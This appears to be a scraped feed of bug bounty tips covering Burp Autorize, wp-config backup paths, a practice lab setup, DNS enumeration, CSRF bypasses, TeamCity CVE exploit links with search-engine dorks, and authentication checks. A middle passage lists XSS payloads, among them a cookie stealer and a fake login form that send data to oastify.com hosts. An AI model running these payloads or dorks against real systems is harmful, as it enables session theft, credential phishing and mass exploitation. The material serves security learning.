Bug bounty Tips

Thank a lot guys, u guys are giving me a positivity to go forward and learn new things

700 guys 😍😍

Heroku api key, this much what should I have to do

How to find Broken Authentication in 30 seconds or less using Autorize

👉Setup Your Autorize in Burp 1. Proxy traffic through Burp 2. Browse the application 3. Select requests -> Extensions -> Autorize -> Send to Autorize 4. Check the "Unauthenticated" tab and column

🚨Here is a list of WP-exposed (wp-config sensitive) files!🚨 /wp-config.php-backup /wp-config.php.orig /.wp-config.php.swp /wp-config-sample.php /wp-config.inc /wp-config.old /wp-config.txt /wp-config.php.txt /wp-config.php.bak /wp-config.php.old /wp-config.php.dist /wp-config.php.inc /wp-config.php.swp /wp-config.php.html /wp-config-backup.txt /wp-config.php.save /wp-config.php~ /wp-config.php.original /_wpeprivate/config.json

Bugbounty Practice Lab by TCM Security. Follow this guide to setup in Kali Linux! Step 1: Installing required packages sudo apt update sudo apt upgrade sudo apt install docker.io sudo apt install docker-compose Restart your Kali VM. Step 2: Unpack the labsCope the labs to a directory on your system (e.g. /home/kali/labs) cd /home/kali/labs unzip bugbounty-v1.0.zip cd bugbounty sudo docker-compose up The first time you run this it will take some time because it needs to download the docker images to your machine. Next time you run it, it should only take 5-30 seconds. Step 3: Setup permissionsIn a different terminal, navigate to where you unzipped the lab (e.g. /home/kali/labs/bugbounty) and run the set-permissions.sh script. This is used for labs that require write access, such as the file upload attacks. ./set-permissions.sh Browse to http://localhost The first time you load the lab the database will need to be initialized, just follow the instructions in the red box by clicking the link, then coming back to the homepage. Enjoy your labs!

🌟DNS Enumeration 🌟 1. DIG: - Importance: Command-line tool for querying DNS information. 2. Host: - Importance: Command-line utility for DNS queries. 3. NMAP (dns-brute script): - Importance: Network scanning tool to identify subdomains and IPs. 4. DNS Recon: - Importance: Dedicated tool for automated DNS information gathering. 5. SecurityTrails: - Importance: Online service for historical DNS data exploration. Importance of DNS Enumeration: - Subdomain Discovery: Identify potential entry points. - IP Address Mapping: Understand target infrastructure. - Vulnerability Assessment: Spot DNS misconfigurations. - Attack Surface Mapping: Identify hosts and services. - *Information Gathering:* Extract valuable domain-related data. DNS enumeration is vital for comprehensively understanding a target's infrastructure and potential vulnerabilities during security assessments.

CSRF - Bypasses 1. Remove the entire token parameter with value/Remove just the value. 2. Use any other random but same length token. 3. Use any other random (length-1) or (length+1) token. 4. Use attacker's token in victim's session. 5. Change the method from POST to GET and remove the token. 6. If request is made through PUT or DELETE then try POST 7. If token is sent through custom header; try to remove the header. 8. Change the Content-Type to application/json, application/x-url-encoded or form-multipart, text/xml, application/xml. 9. If double submit token is there (in cookies and some header) then try CRLF injection. 10. Bypassing referrer check: i. If the referrer header is checked but only when it exists in the request then add this piece of code in your csrf poc:

<meta name="referrer" content="never">

ii. Regex Referral bypass: 11. CSRF token stealing via xss/htmli/cors. 12. JSON Based: i. Change the Content-Type to text/plain, application/x-www-form-urlencoded, multipart/form-data and check if it accepts. ii. Use flash + 307 redirect. 13. Guessable CSRF token. 14. Clickjacking to strong CSRF token bypass. 15. Type Juggling. 16. Array: newemail=victim@gmail.com&csrftoken[]=lol 17. Set the csrf token to "null" or add null bytes. 18. Check whether csrf token is sent over http or sent to 3rd party. See here 19. Generate multiple csrf tokens, observe the static part. Keep it as it is and play with the dynamic part.

If you got a chance to choose one thing! What will you choose? Guys let's discuss 🤘

<A HREF="http://evil.com/">Login Here </A> <script>document.location.href="http://evil.com"</script> <h3>Please login to proceed</h3> <form action=http://abp16yqa8m56p2kznk76xvmnqew5kwakz.oastify.com>Username:<br><input type="username" name="username"></br>Password:<br><input type="password" name="password"></br><br><input type="submit" value="Login"></br> csp bypass: <script>alert(1)</script>&token=;script-src-elem 'unsafe-inline' iframe: "><iframe src="https://nasa.gov" style="border: 0; position:fixed; top:0; left:0; right:0; bottom:0; width:100%; height:100%"> <IFRAME SRC="javascript:alert(document.cookie);"></iframe> cookie stealer: <script>document.location='http://sb7j6gqs845opkkhn27oxdm5qwwnks8h.oastify.com?c='+document.cookie</script> <script>new Image().src="http://localhost/cookie.php?c="+document.cookie</script> <script>document.body.background=”https://www.jhadol.com/images/photos/original/1465212129eukl.jpg“;</script> <script>window.location=”https://coffinxp.000webhostapp.com/coffinxp1.html”;</script> <script>document.body.bgColor=”red”;</script>

if you guys like this give me a reaction guys.

Good morning, i have created a video on how to use @cipherinfo_bot, i have shown the demo here you guys can check it out. caution: education purpose only, i am not liable for anything.

CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity exploit https://github.com/W01fh4cker/CVE-2024-27198-RCE https://github.com/Chocapikk/CVE-2024-27198 https://github.com/rapid7/metasploit-framework/pull/18922 Cyberspace Mapping Dork:

Fofa
app="JET_BRAINS-TeamCity"

ZoomEye
app:"JetBrains TeamCity"

Hunter.how
product.name="TeamCity"

Shodan
http.component:"teamcity"

Read research: https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

New collection of bug bounty tips #6 is out! 1. Open arbitrary URL in Android app 2. Directory traversal payloads for easy wins 3. Find open redirect vulnerabilities with gf 4. Find out what websites are built with 5. Scanning at scale with Axiom 6. Trick to access admin panel by adding %20 7. Web servers on non-standard ports (Shodan) 8. Fingerprinting with Shodan and Nuclei engine 9. Generate custom wordlist from any domain 10. Account takeover by reset token disclosure (Burp) 11. Top 20+ Burp extensions for bug bounty hunting 12. Phpinfo() with sensitive information 13. Keep track of attack surface with Amass https://www.infosecmatter.com/bug-bounty-tips-6-sep-07/

In God we TrUst, the Rest We TesT <3 Testing authentication Burp extension to see what users can see (authorization) basic auth brute force Password quality rules, length, character set allowed (alphanumeric, upper/lower case and special characters). Empty Password? Empty username? 123456? Test username enumeration Test account recovery functionality, look for SMTP header injection. Does remember me expires? Test removing your email address from your account, add a new one, make sure that the old one can not be used to recover password/log in. Delete an account without entering password or other sensitive operations, in case you forgot your computer logged in. Password bruteforcing resilience. Application locks after some attempts? Rate limiting in change password functionality, forgot to log out in a cyber cafe, brute force the actual password using this feature. Does the application lock out an account after x number of login attempts? Email verification links through http Cookies: scope, httponly, secure flag. Broken OAuth authentication, make sure ID tokens generated by google or third party are properly validated on the backend. https://developers.google.com/identity/sign-in/web/backend-auth#verify-the-integrity-of-the-id-token Other strange access control methods such as referral validation (which can be bypassed https://t.co/z84ajd7bmO) Does the remember me function ever expire? Is there room for exploit-ability in cookies combined with other attacks? Test username uniqueness How are logins processed, are they sent over http? Are details sent in a POST request or are they included in the URL(this is bad if they are, especially passwords)? Test NULL %00 characters in the username and password fields. Test for fail-open conditions. Fail-open authentication is the situation when the user authentication fails but results in providing open access to authenticated and secure sections of the web application to the end user. Cookie poisoning. Try requesting the cookie names in the query string and body, some servers might read the parameters and set them as cookies. This can allow cookie poisoning. Set new password with old password